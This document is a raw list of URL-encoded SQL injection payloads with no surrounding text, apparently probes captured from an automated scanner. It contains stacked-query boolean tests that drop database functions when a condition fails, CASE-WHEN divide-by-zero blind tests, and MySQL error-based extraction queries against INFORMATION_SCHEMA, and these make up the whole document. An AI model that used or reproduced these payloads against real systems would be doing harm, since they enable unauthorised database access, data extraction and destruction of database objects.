foo%27%29%29%29%3B%20IF%281033%3D5894%29%20SELECT%201033%20ELSE%20DROP%20FUNCTION%20otbL-- foo%27%29%29%29%3B%20IF%289919%3D9919%29%20SELECT%209919%20ELSE%20DROP%20FUNCTION%20ZCBb-- foo%27%3B%20IF%284541%3D9607%29%20SELECT%204541%20ELSE%20DROP%20FUNCTION%20MQxx-- foo%27%3B%20IF%289919%3D9919%29%20SELECT%209919%20ELSE%20DROP%20FUNCTION%20ZCBb-- foo%27%29%3B%20IF%285185%3D9198%29%20SELECT%205185%20ELSE%20DROP%20FUNCTION%20WLxN-- foo%27%29%3B%20IF%289919%3D9919%29%20SELECT%209919%20ELSE%20DROP%20FUNCTION%20ZCBb-- foo%27%29%29%3B%20IF%285280%3D8061%29%20SELECT%205280%20ELSE%20DROP%20FUNCTION%20VrYt-- foo%27%29%29%3B%20IF%289919%3D9919%29%20SELECT%209919%20ELSE%20DROP%20FUNCTION%20ZCBb-- foo%27%29%29%29%3B%20IF%283266%3D2961%29%20SELECT%203266%20ELSE%20DROP%20FUNCTION%20UTFn-- foo%27%29%29%29%3B%20IF%289919%3D9919%29%20SELECT%209919%20ELSE%20DROP%20FUNCTION%20ZCBb-- foo%27%3B%20IF%289446%3D4477%29%20SELECT%209446%20ELSE%20DROP%20FUNCTION%20bkvR-- foo%27%3B%20IF%289919%3D9919%29%20SELECT%209919%20ELSE%20DROP%20FUNCTION%20ZCBb-- foo%22%29%3B%20IF%283454%3D9172%29%20SELECT%203454%20ELSE%20DROP%20FUNCTION%20Beqa-- foo%22%29%3B%20IF%289919%3D9919%29%20SELECT%209919%20ELSE%20DROP%20FUNCTION%20ZCBb-- foo%22%29%29%3B%20IF%282182%3D9257%29%20SELECT%202182%20ELSE%20DROP%20FUNCTION%20SDPf-- foo%22%29%29%3B%20IF%289919%3D9919%29%20SELECT%209919%20ELSE%20DROP%20FUNCTION%20ZCBb-- foo%22%29%29%29%3B%20IF%282187%3D9849%29%20SELECT%202187%20ELSE%20DROP%20FUNCTION%20pCFG-- foo%22%29%29%29%3B%20IF%289919%3D9919%29%20SELECT%209919%20ELSE%20DROP%20FUNCTION%20ZCBb-- foo%22%3B%20IF%281003%3D5315%29%20SELECT%201003%20ELSE%20DROP%20FUNCTION%20IzYN-- foo%22%3B%20IF%289919%3D9919%29%20SELECT%209919%20ELSE%20DROP%20FUNCTION%20ZCBb-- foo%22%29%3B%20IF%288447%3D8851%29%20SELECT%208447%20ELSE%20DROP%20FUNCTION%20yIoC-- foo%22%29%3B%20IF%289919%3D9919%29%20SELECT%209919%20ELSE%20DROP%20FUNCTION%20ZCBb-- foo%22%29%29%3B%20IF%281410%3D4781%29%20SELECT%201410%20ELSE%20DROP%20FUNCTION%20dKqX-- foo%22%29%29%3B%20IF%289919%3D9919%29%20SELECT%209919%20ELSE%20DROP%20FUNCTION%20ZCBb-- foo%22%29%29%29%3B%20IF%288379%3D6266%29%20SELECT%208379%20ELSE%20DROP%20FUNCTION%20oCop-- foo%22%29%29%29%3B%20IF%289919%3D9919%29%20SELECT%209919%20ELSE%20DROP%20FUNCTION%20ZCBb-- foo%22%3B%20IF%285122%3D6951%29%20SELECT%205122%20ELSE%20DROP%20FUNCTION%20sclk-- foo%22%3B%20IF%289919%3D9919%29%20SELECT%209919%20ELSE%20DROP%20FUNCTION%20ZCBb-- foo%25%27%29%3B%20IF%286476%3D6369%29%20SELECT%206476%20ELSE%20DROP%20FUNCTION%20RRRA-- foo%25%27%29%3B%20IF%289919%3D9919%29%20SELECT%209919%20ELSE%20DROP%20FUNCTION%20ZCBb-- foo%25%27%29%29%3B%20IF%285712%3D2711%29%20SELECT%205712%20ELSE%20DROP%20FUNCTION%20sVaI-- foo%25%27%29%29%3B%20IF%289919%3D9919%29%20SELECT%209919%20ELSE%20DROP%20FUNCTION%20ZCBb-- foo%25%27%29%29%29%3B%20IF%286546%3D9520%29%20SELECT%206546%20ELSE%20DROP%20FUNCTION%20FUfY-- foo%25%27%29%29%29%3B%20IF%289919%3D9919%29%20SELECT%209919%20ELSE%20DROP%20FUNCTION%20ZCBb-- foo%25%27%3B%20IF%284915%3D1620%29%20SELECT%204915%20ELSE%20DROP%20FUNCTION%20CvQN-- foo%25%27%3B%20IF%289919%3D9919%29%20SELECT%209919%20ELSE%20DROP%20FUNCTION%20ZCBb-- foo%00%27%29%3B%20IF%289319%3D1628%29%20SELECT%209319%20ELSE%20DROP%20FUNCTION%20VhTd-- foo%00%27%29%3B%20IF%289919%3D9919%29%20SELECT%209919%20ELSE%20DROP%20FUNCTION%20ZCBb-- foo%00%27%3B%20IF%287925%3D1940%29%20SELECT%207925%20ELSE%20DROP%20FUNCTION%20hBKU-- foo%00%27%3B%20IF%289919%3D9919%29%20SELECT%209919%20ELSE%20DROP%20FUNCTION%20ZCBb-- foo%27%29%20WHERE%203145%3D3145%3B%20IF%286168%3D1290%29%20SELECT%206168%20ELSE%20DROP%20FUNCTION%20MnYR-- foo%27%29%20WHERE%206560%3D6560%3B%20IF%289919%3D9919%29%20SELECT%209919%20ELSE%20DROP%20FUNCTION%20ZCBb-- foo%22%29%20WHERE%202741%3D2741%3B%20IF%287265%3D4298%29%20SELECT%207265%20ELSE%20DROP%20FUNCTION%20VEwH-- foo%22%29%20WHERE%209545%3D9545%3B%20IF%289919%3D9919%29%20SELECT%209919%20ELSE%20DROP%20FUNCTION%20ZCBb-- foo%29%20WHERE%203189%3D3189%3B%20IF%281787%3D3963%29%20SELECT%201787%20ELSE%20DROP%20FUNCTION%20MmsB-- foo%29%20WHERE%207437%3D7437%3B%20IF%289919%3D9919%29%20SELECT%209919%20ELSE%20DROP%20FUNCTION%20ZCBb-- foo%27%20WHERE%205426%3D5426%3B%20IF%285140%3D9631%29%20SELECT%205140%20ELSE%20DROP%20FUNCTION%20PGbx-- foo%27%20WHERE%208689%3D8689%3B%20IF%289919%3D9919%29%20SELECT%209919%20ELSE%20DROP%20FUNCTION%20ZCBb-- foo%22%20WHERE%201696%3D1696%3B%20IF%285972%3D4039%29%20SELECT%205972%20ELSE%20DROP%20FUNCTION%20Yhdn-- foo%22%20WHERE%209274%3D9274%3B%20IF%289919%3D9919%29%20SELECT%209919%20ELSE%20DROP%20FUNCTION%20ZCBb-- foo%20WHERE%205175%3D5175%3B%20IF%286828%3D3639%29%20SELECT%206828%20ELSE%20DROP%20FUNCTION%20rOla-- foo%20WHERE%204049%3D4049%3B%20IF%289919%3D9919%29%20SELECT%209919%20ELSE%20DROP%20FUNCTION%20ZCBb-- foo%27%7C%7C%28SELECT%20%27SmUs%27%20FROM%20DUAL%20WHERE%203501%3D3501%3B%20IF%281163%3D6017%29%20SELECT%201163%20ELSE%20DROP%20FUNCTION%20fKWD-- foo%27%7C%7C%28SELECT%20%27xkTQ%27%20FROM%20DUAL%20WHERE%204511%3D4511%3B%20IF%289919%3D9919%29%20SELECT%209919%20ELSE%20DROP%20FUNCTION%20ZCBb-- foo%27%7C%7C%28SELECT%20%27hkeh%27%20WHERE%202846%3D2846%3B%20IF%282970%3D2122%29%20SELECT%202970%20ELSE%20DROP%20FUNCTION%20rwLe-- foo%27%7C%7C%28SELECT%20%27hwXN%27%20WHERE%208327%3D8327%3B%20IF%289919%3D9919%29%20SELECT%209919%20ELSE%20DROP%20FUNCTION%20ZCBb-- foo%27%2B%28SELECT%20kgkQ%20WHERE%205063%3D5063%3B%20IF%288868%3D3212%29%20SELECT%208868%20ELSE%20DROP%20FUNCTION%20NDVT-- foo%27%2B%28SELECT%20DZnM%20WHERE%209527%3D9527%3B%20IF%289919%3D9919%29%20SELECT%209919%20ELSE%20DROP%20FUNCTION%20ZCBb-- foo%27%2B%28SELECT%20%27NCaB%27%20WHERE%205754%3D5754%3B%20IF%281539%3D3537%29%20SELECT%201539%20ELSE%20DROP%20FUNCTION%20BLgO-- foo%27%2B%28SELECT%20%27ljDW%27%20WHERE%201534%3D1534%3B%20IF%289919%3D9919%29%20SELECT%209919%20ELSE%20DROP%20FUNCTION%20ZCBb-- foo%27%20IN%20BOOLEAN%20MODE%29%3B%20IF%288597%3D1619%29%20SELECT%208597%20ELSE%20DROP%20FUNCTION%20fybW-- foo%27%20IN%20BOOLEAN%20MODE%29%3B%20IF%289919%3D9919%29%20SELECT%209919%20ELSE%20DROP%20FUNCTION%20ZCBb-- -5761%29%3B%20SELECT%20%28CASE%20WHEN%20%286233%3D2019%29%20THEN%206233%20ELSE%201%2F%28SELECT%200%29%20END%29-- -7751%29%3B%20SELECT%20%28CASE%20WHEN%20%286177%3D6177%29%20THEN%206177%20ELSE%201%2F%28SELECT%200%29%20END%29-- -9659%29%3B%20SELECT%20%28CASE%20WHEN%20%281605%3D8234%29%20THEN%201605%20ELSE%201%2F%28SELECT%200%29%20END%29-- -9267%27%29%3B%20SELECT%20%28CASE%20WHEN%20%283592%3D3209%29%20THEN%203592%20ELSE%201%2F%28SELECT%200%29%20END%29-- -3031%27%29%3B%20SELECT%20%28CASE%20WHEN%20%286177%3D6177%29%20THEN%206177%20ELSE%201%2F%28SELECT%200%29%20END%29-- -9305%27%29%3B%20SELECT%20%28CASE%20WHEN%20%282663%3D6681%29%20THEN%202663%20ELSE%201%2F%28SELECT%200%29%20END%29-- -4494%27%3B%20SELECT%20%28CASE%20WHEN%20%284672%3D5049%29%20THEN%204672%20ELSE%201%2F%28SELECT%200%29%20END%29-- -4884%27%3B%20SELECT%20%28CASE%20WHEN%20%286177%3D6177%29%20THEN%206177%20ELSE%201%2F%28SELECT%200%29%20END%29-- -6860%27%3B%20SELECT%20%28CASE%20WHEN%20%282378%3D2921%29%20THEN%202378%20ELSE%201%2F%28SELECT%200%29%20END%29-- -1653%22%3B%20SELECT%20%28CASE%20WHEN%20%282778%3D4879%29%20THEN%202778%20ELSE%201%2F%28SELECT%200%29%20END%29-- -3695%22%3B%20SELECT%20%28CASE%20WHEN%20%286177%3D6177%29%20THEN%206177%20ELSE%201%2F%28SELECT%200%29%20END%29-- -1698%22%3B%20SELECT%20%28CASE%20WHEN%20%288351%3D7492%29%20THEN%208351%20ELSE%201%2F%28SELECT%200%29%20END%29-- -4987%29%3B%20SELECT%20%28CASE%20WHEN%20%283864%3D1062%29%20THEN%203864%20ELSE%201%2F%28SELECT%200%29%20END%29-- -3086%29%3B%20SELECT%20%28CASE%20WHEN%20%286177%3D6177%29%20THEN%206177%20ELSE%201%2F%28SELECT%200%29%20END%29-- -4908%29%3B%20SELECT%20%28CASE%20WHEN%20%289961%3D7809%29%20THEN%209961%20ELSE%201%2F%28SELECT%200%29%20END%29-- -5739%29%29%3B%20SELECT%20%28CASE%20WHEN%20%282109%3D9555%29%20THEN%202109%20ELSE%201%2F%28SELECT%200%29%20END%29-- -1533%29%29%3B%20SELECT%20%28CASE%20WHEN%20%286177%3D6177%29%20THEN%206177%20ELSE%201%2F%28SELECT%200%29%20END%29-- -4613%29%29%3B%20SELECT%20%28CASE%20WHEN%20%286264%3D5691%29%20THEN%206264%20ELSE%201%2F%28SELECT%200%29%20END%29-- -5727%29%29%29%3B%20SELECT%20%28CASE%20WHEN%20%282504%3D1757%29%20THEN%202504%20ELSE%201%2F%28SELECT%200%29%20END%29-- -4809%29%29%29%3B%20SELECT%20%28CASE%20WHEN%20%286177%3D6177%29%20THEN%206177%20ELSE%201%2F%28SELECT%200%29%20END%29-- -3874%29%29%29%3B%20SELECT%20%28CASE%20WHEN%20%286131%3D7257%29%20THEN%206131%20ELSE%201%2F%28SELECT%200%29%20END%29-- -7169%3B%20SELECT%20%28CASE%20WHEN%20%286195%3D9739%29%20THEN%206195%20ELSE%201%2F%28SELECT%200%29%20END%29-- -2779%3B%20SELECT%20%28CASE%20WHEN%20%286177%3D6177%29%20THEN%206177%20ELSE%201%2F%28SELECT%200%29%20END%29-- -8910%3B%20SELECT%20%28CASE%20WHEN%20%287675%3D7258%29%20THEN%207675%20ELSE%201%2F%28SELECT%200%29%20END%29-- -1301%27%29%3B%20SELECT%20%28CASE%20WHEN%20%282022%3D2397%29%20THEN%202022%20ELSE%201%2F%28SELECT%200%29%20END%29-- -5383%27%29%3B%20SELECT%20%28CASE%20WHEN%20%286177%3D6177%29%20THEN%206177%20ELSE%201%2F%28SELECT%200%29%20END%29-- -8872%27%29%3B%20SELECT%20%28CASE%20WHEN%20%286093%3D1090%29%20THEN%206093%20ELSE%201%2F%28SELECT%200%29%20END%29-- -6066%27%29%29%3B%20SELECT%20%28CASE%20WHEN%20%281520%3D7853%29%20THEN%201520%20ELSE%201%2F%28SELECT%200%29%20END%29-- -2344%27%29%29%3B%20SELECT%20%28CASE%20WHEN%20%286177%3D6177%29%20THEN%206177%20ELSE%201%2F%28SELECT%200%29%20END%29-- -4850%27%29%29%3B%20SELECT%20%28CASE%20WHEN%20%287830%3D2197%29%20THEN%207830%20ELSE%201%2F%28SELECT%200%29%20END%29-- -2138%27%29%29%29%3B%20SELECT%20%28CASE%20WHEN%20%284579%3D3399%29%20THEN%204579%20ELSE%201%2F%28SELECT%200%29%20END%29-- -3491%27%29%29%29%3B%20SELECT%20%28CASE%20WHEN%20%286177%3D6177%29%20THEN%206177%20ELSE%201%2F%28SELECT%200%29%20END%29-- -7611%27%29%29%29%3B%20SELECT%20%28CASE%20WHEN%20%283952%3D8805%29%20THEN%203952%20ELSE%201%2F%28SELECT%200%29%20END%29-- -9301%27%3B%20SELECT%20%28CASE%20WHEN%20%288552%3D6571%29%20THEN%208552%20ELSE%201%2F%28SELECT%200%29%20END%29-- -6142%27%3B%20SELECT%20%28CASE%20WHEN%20%286177%3D6177%29%20THEN%206177%20ELSE%201%2F%28SELECT%200%29%20END%29-- -1445%27%3B%20SELECT%20%28CASE%20WHEN%20%287783%3D5368%29%20THEN%207783%20ELSE%201%2F%28SELECT%200%29%20END%29-- -5515%27%29%3B%20SELECT%20%28CASE%20WHEN%20%285685%3D6281%29%20THEN%205685%20ELSE%201%2F%28SELECT%200%29%20END%29-- -4537%27%29%3B%20SELECT%20%28CASE%20WHEN%20%286177%3D6177%29%20THEN%206177%20ELSE%201%2F%28SELECT%200%29%20END%29-- -8559%27%29%3B%20SELECT%20%28CASE%20WHEN%20%286042%3D7487%29%20THEN%206042%20ELSE%201%2F%28SELECT%200%29%20END%29-- -4889%27%29%29%3B%20SELECT%20%28CASE%20WHEN%20%289813%3D8225%29%20THEN%209813%20ELSE%201%2F%28SELECT%200%29%20END%29-- -9006%27%29%29%3B%20SELECT%20%28CASE%20WHEN%20%286177%3D6177%29%20THEN%206177%20ELSE%201%2F%28SELECT%200%29%20END%29-- -4129%27%29%29%3B%20SELECT%20%28CASE%20WHEN%20%289752%3D9304%29%20THEN%209752%20ELSE%201%2F%28SELECT%200%29%20END%29-- -7923%27%29%29%29%3B%20SELECT%20%28CASE%20WHEN%20%288102%3D9036%29%20THEN%208102%20ELSE%201%2F%28SELECT%200%29%20END%29-- -4403%27%29%29%29%3B%20SELECT%20%28CASE%20WHEN%20%286177%3D6177%29%20THEN%206177%20ELSE%201%2F%28SELECT%200%29%20END%29-- -1005%27%29%29%29%3B%20SELECT%20%28CASE%20WHEN%20%283323%3D7459%29%20THEN%203323%20ELSE%201%2F%28SELECT%200%29%20END%29-- -5909%27%3B%20SELECT%20%28CASE%20WHEN%20%285087%3D4566%29%20THEN%205087%20ELSE%201%2F%28SELECT%200%29%20END%29-- -2562%27%3B%20SELECT%20%28CASE%20WHEN%20%286177%3D6177%29%20THEN%206177%20ELSE%201%2F%28SELECT%200%29%20END%29-- -2831%27%3B%20SELECT%20%28CASE%20WHEN%20%284557%3D6711%29%20THEN%204557%20ELSE%201%2F%28SELECT%200%29%20END%29-- -8393%22%29%3B%20SELECT%20%28CASE%20WHEN%20%286909%3D6516%29%20THEN%206909%20ELSE%201%2F%28SELECT%200%29%20END%29-- -4095%22%29%3B%20SELECT%20%28CASE%20WHEN%20%286177%3D6177%29%20THEN%206177%20ELSE%201%2F%28SELECT%200%29%20END%29-- -7372%22%29%3B%20SELECT%20%28CASE%20WHEN%20%281479%3D2482%29%20THEN%201479%20ELSE%201%2F%28SELECT%200%29%20END%29-- -7237%22%29%29%3B%20SELECT%20%28CASE%20WHEN%20%287729%3D7854%29%20THEN%207729%20ELSE%201%2F%28SELECT%200%29%20END%29-- -3408%22%29%29%3B%20SELECT%20%28CASE%20WHEN%20%286177%3D6177%29%20THEN%206177%20ELSE%201%2F%28SELECT%200%29%20END%29-- -7564%22%29%29%3B%20SELECT%20%28CASE%20WHEN%20%288293%3D8107%29%20THEN%208293%20ELSE%201%2F%28SELECT%200%29%20END%29-- -5073%22%29%29%29%3B%20SELECT%20%28CASE%20WHEN%20%288084%3D1524%29%20THEN%208084%20ELSE%201%2F%28SELECT%200%29%20END%29-- -9510%22%29%29%29%3B%20SELECT%20%28CASE%20WHEN%20%286177%3D6177%29%20THEN%206177%20ELSE%201%2F%28SELECT%200%29%20END%29-- -9525%22%29%29%29%3B%20SELECT%20%28CASE%20WHEN%20%281418%3D6189%29%20THEN%201418%20ELSE%201%2F%28SELECT%200%29%20END%29-- -3980%22%3B%20SELECT%20%28CASE%20WHEN%20%281362%3D4797%29%20THEN%201362%20ELSE%201%2F%28SELECT%200%29%20END%29-- -3889%22%3B%20SELECT%20%28CASE%20WHEN%20%286177%3D6177%29%20THEN%206177%20ELSE%201%2F%28SELECT%200%29%20END%29-- -2749%22%3B%20SELECT%20%28CASE%20WHEN%20%281113%3D3012%29%20THEN%201113%20ELSE%201%2F%28SELECT%200%29%20END%29-- -2749%22%29%3B%20SELECT%20%28CASE%20WHEN%20%284367%3D9520%29%20THEN%204367%20ELSE%201%2F%28SELECT%200%29%20END%29-- -2125%22%29%3B%20SELECT%20%28CASE%20WHEN%20%286177%3D6177%29%20THEN%206177%20ELSE%201%2F%28SELECT%200%29%20END%29-- -1802%22%29%3B%20SELECT%20%28CASE%20WHEN%20%281408%3D7188%29%20THEN%201408%20ELSE%201%2F%28SELECT%200%29%20END%29-- -1678%22%29%29%3B%20SELECT%20%28CASE%20WHEN%20%281080%3D7360%29%20THEN%201080%20ELSE%201%2F%28SELECT%200%29%20END%29-- -2188%22%29%29%3B%20SELECT%20%28CASE%20WHEN%20%286177%3D6177%29%20THEN%206177%20ELSE%201%2F%28SELECT%200%29%20END%29-- -4723%22%29%29%3B%20SELECT%20%28CASE%20WHEN%20%285344%3D4537%29%20THEN%205344%20ELSE%201%2F%28SELECT%200%29%20END%29-- -5183%22%29%29%29%3B%20SELECT%20%28CASE%20WHEN%20%286835%3D8879%29%20THEN%206835%20ELSE%201%2F%28SELECT%200%29%20END%29-- -1229%22%29%29%29%3B%20SELECT%20%28CASE%20WHEN%20%286177%3D6177%29%20THEN%206177%20ELSE%201%2F%28SELECT%200%29%20END%29-- -5357%22%29%29%29%3B%20SELECT%20%28CASE%20WHEN%20%282453%3D1875%29%20THEN%202453%20ELSE%201%2F%28SELECT%200%29%20END%29-- -3929%22%3B%20SELECT%20%28CASE%20WHEN%20%289535%3D4231%29%20THEN%209535%20ELSE%201%2F%28SELECT%200%29%20END%29-- -9981%22%3B%20SELECT%20%28CASE%20WHEN%20%286177%3D6177%29%20THEN%206177%20ELSE%201%2F%28SELECT%200%29%20END%29-- -1654%22%3B%20SELECT%20%28CASE%20WHEN%20%284982%3D8073%29%20THEN%204982%20ELSE%201%2F%28SELECT%200%29%20END%29-- -8269%25%27%29%3B%20SELECT%20%28CASE%20WHEN%20%286599%3D5530%29%20THEN%206599%20ELSE%201%2F%28SELECT%200%29%20END%29-- -2712%25%27%29%3B%20SELECT%20%28CASE%20WHEN%20%286177%3D6177%29%20THEN%206177%20ELSE%201%2F%28SELECT%200%29%20END%29-- -6542%25%27%29%3B%20SELECT%20%28CASE%20WHEN%20%287507%3D9471%29%20THEN%207507%20ELSE%201%2F%28SELECT%200%29%20END%29-- -9367%25%27%29%29%3B%20SELECT%20%28CASE%20WHEN%20%286868%3D7987%29%20THEN%206868%20ELSE%201%2F%28SELECT%200%29%20END%29-- -7335%25%27%29%29%3B%20SELECT%20%28CASE%20WHEN%20%286177%3D6177%29%20THEN%206177%20ELSE%201%2F%28SELECT%200%29%20END%29-- -1052%25%27%29%29%3B%20SELECT%20%28CASE%20WHEN%20%286000%3D6785%29%20THEN%206000%20ELSE%201%2F%28SELECT%200%29%20END%29-- -3628%25%27%29%29%29%3B%20SELECT%20%28CASE%20WHEN%20%286293%3D5701%29%20THEN%206293%20ELSE%201%2F%28SELECT%200%29%20END%29-- -4512%25%27%29%29%29%3B%20SELECT%20%28CASE%20WHEN%20%286177%3D6177%29%20THEN%206177%20ELSE%201%2F%28SELECT%200%29%20END%29-- -6892%25%27%29%29%29%3B%20SELECT%20%28CASE%20WHEN%20%285858%3D2303%29%20THEN%205858%20ELSE%201%2F%28SELECT%200%29%20END%29-- -9166%25%27%3B%20SELECT%20%28CASE%20WHEN%20%288947%3D8164%29%20THEN%208947%20ELSE%201%2F%28SELECT%200%29%20END%29-- -1573%25%27%3B%20SELECT%20%28CASE%20WHEN%20%286177%3D6177%29%20THEN%206177%20ELSE%201%2F%28SELECT%200%29%20END%29-- -3732%25%27%3B%20SELECT%20%28CASE%20WHEN%20%288581%3D6687%29%20THEN%208581%20ELSE%201%2F%28SELECT%200%29%20END%29-- -6114%00%27%29%3B%20SELECT%20%28CASE%20WHEN%20%282042%3D3114%29%20THEN%202042%20ELSE%201%2F%28SELECT%200%29%20END%29-- -8204%00%27%29%3B%20SELECT%20%28CASE%20WHEN%20%286177%3D6177%29%20THEN%206177%20ELSE%201%2F%28SELECT%200%29%20END%29-- -8702%00%27%29%3B%20SELECT%20%28CASE%20WHEN%20%283187%3D6515%29%20THEN%203187%20ELSE%201%2F%28SELECT%200%29%20END%29-- -5760%00%27%3B%20SELECT%20%28CASE%20WHEN%20%285017%3D5287%29%20THEN%205017%20ELSE%201%2F%28SELECT%200%29%20END%29-- -1943%00%27%3B%20SELECT%20%28CASE%20WHEN%20%286177%3D6177%29%20THEN%206177%20ELSE%201%2F%28SELECT%200%29%20END%29-- -3723%00%27%3B%20SELECT%20%28CASE%20WHEN%20%286870%3D4405%29%20THEN%206870%20ELSE%201%2F%28SELECT%200%29%20END%29-- -7688%27%29%20WHERE%201123%3D1123%3B%20SELECT%20%28CASE%20WHEN%20%284503%3D8728%29%20THEN%204503%20ELSE%201%2F%28SELECT%200%29%20END%29-- -3846%27%29%20WHERE%205675%3D5675%3B%20SELECT%20%28CASE%20WHEN%20%286177%3D6177%29%20THEN%206177%20ELSE%201%2F%28SELECT%200%29%20END%29-- -3029%27%29%20WHERE%204668%3D4668%3B%20SELECT%20%28CASE%20WHEN%20%285738%3D1540%29%20THEN%205738%20ELSE%201%2F%28SELECT%200%29%20END%29-- -2315%22%29%20WHERE%209523%3D9523%3B%20SELECT%20%28CASE%20WHEN%20%287423%3D1715%29%20THEN%207423%20ELSE%201%2F%28SELECT%200%29%20END%29-- -6775%22%29%20WHERE%205720%3D5720%3B%20SELECT%20%28CASE%20WHEN%20%286177%3D6177%29%20THEN%206177%20ELSE%201%2F%28SELECT%200%29%20END%29-- -4556%22%29%20WHERE%202184%3D2184%3B%20SELECT%20%28CASE%20WHEN%20%288141%3D4096%29%20THEN%208141%20ELSE%201%2F%28SELECT%200%29%20END%29-- -1152%29%20WHERE%207099%3D7099%3B%20SELECT%20%28CASE%20WHEN%20%286414%3D5729%29%20THEN%206414%20ELSE%201%2F%28SELECT%200%29%20END%29-- -5962%29%20WHERE%203875%3D3875%3B%20SELECT%20%28CASE%20WHEN%20%286177%3D6177%29%20THEN%206177%20ELSE%201%2F%28SELECT%200%29%20END%29-- -4138%29%20WHERE%203813%3D3813%3B%20SELECT%20%28CASE%20WHEN%20%284030%3D5484%29%20THEN%204030%20ELSE%201%2F%28SELECT%200%29%20END%29-- -8820%27%20WHERE%204368%3D4368%3B%20SELECT%20%28CASE%20WHEN%20%284970%3D8447%29%20THEN%204970%20ELSE%201%2F%28SELECT%200%29%20END%29-- -7705%27%20WHERE%208044%3D8044%3B%20SELECT%20%28CASE%20WHEN%20%286177%3D6177%29%20THEN%206177%20ELSE%201%2F%28SELECT%200%29%20END%29-- -8394%27%20WHERE%208611%3D8611%3B%20SELECT%20%28CASE%20WHEN%20%286026%3D6681%29%20THEN%206026%20ELSE%201%2F%28SELECT%200%29%20END%29-- -4671%22%20WHERE%201154%3D1154%3B%20SELECT%20%28CASE%20WHEN%20%281146%3D3735%29%20THEN%201146%20ELSE%201%2F%28SELECT%200%29%20END%29-- -3739%22%20WHERE%204374%3D4374%3B%20SELECT%20%28CASE%20WHEN%20%286177%3D6177%29%20THEN%206177%20ELSE%201%2F%28SELECT%200%29%20END%29-- -1920%22%20WHERE%205082%3D5082%3B%20SELECT%20%28CASE%20WHEN%20%281759%3D5875%29%20THEN%201759%20ELSE%201%2F%28SELECT%200%29%20END%29-- -4560%20WHERE%208700%3D8700%3B%20SELECT%20%28CASE%20WHEN%20%288955%3D9992%29%20THEN%208955%20ELSE%201%2F%28SELECT%200%29%20END%29-- -6959%20WHERE%207491%3D7491%3B%20SELECT%20%28CASE%20WHEN%20%286177%3D6177%29%20THEN%206177%20ELSE%201%2F%28SELECT%200%29%20END%29-- -6640%20WHERE%201899%3D1899%3B%20SELECT%20%28CASE%20WHEN%20%287642%3D4544%29%20THEN%207642%20ELSE%201%2F%28SELECT%200%29%20END%29-- foo%29%20AND%20%28SELECT%206197%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%286197%3D6197%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29 foo%27%29%20AND%20%28SELECT%206197%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%286197%3D6197%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29 foo%27%20AND%20%28SELECT%206197%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%286197%3D6197%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29 foo%22%20AND%20%28SELECT%206197%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%286197%3D6197%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29 foo%29%20AND%20%28SELECT%206197%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%286197%3D6197%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%288127%3D8127 foo%29%29%20AND%20%28SELECT%206197%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%286197%3D6197%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%284582%3D4582 foo%29%29%29%20AND%20%28SELECT%206197%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%286197%3D6197%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%282064%3D2064 foo%20AND%20%28SELECT%206197%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%286197%3D6197%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29 foo%27%29%20AND%20%28SELECT%206197%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%286197%3D6197%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%27KyOQ%27%3D%27KyOQ foo%27%29%29%20AND%20%28SELECT%206197%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%286197%3D6197%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%27rKNB%27%3D%27rKNB 